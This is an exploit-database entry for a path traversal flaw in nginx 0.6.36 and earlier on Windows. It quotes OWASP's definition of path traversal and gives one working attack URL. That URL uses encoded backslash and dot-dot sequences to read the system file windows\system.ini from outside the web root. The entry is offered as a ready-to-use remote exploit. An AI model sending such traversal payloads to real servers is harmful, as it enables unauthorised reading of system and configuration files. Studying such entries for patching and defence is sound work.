nginx [engine x] http server <= 0.6.36 Path Draversal

2010-05-30T00:00:00
ID 1337DAY-ID-12459
Type zdt
Reporter cp77fk4r
Modified 2010-05-30T00:00:00

Description

Exploit for multiple platform in category remote exploits

                                        
                                            =====================================================
nginx [engine x] http server <= 0.6.36 Path Draversal
=====================================================


# Exploit Title: nginx [engine x] http server <= 0.6.36 Path Draversal
# Date: 20/05/10
# Author: cp77fk4r 
# Software Link: http://nginx.org/
# Version: <= 0.6.36
# Tested on: Win32
#
##[Path Traversal:]
A Path Traversal attack aims to access files and directories that are stored
outside the web root folder. By browsing the application, the attacker looks
for absolute links to files stored on the web server. By manipulating
variables that reference files with “dot-dot-slash (../)” sequences and its
variations, it may be possible to access arbitrary files and directories
stored on file system, including application source code, configuration and
critical system files, limited by system operational access control. The
attacker uses “../” sequences to move up to root directory, thus permitting
navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem.ini
#
#
[e0f]



#  0day.today [2018-04-01]  #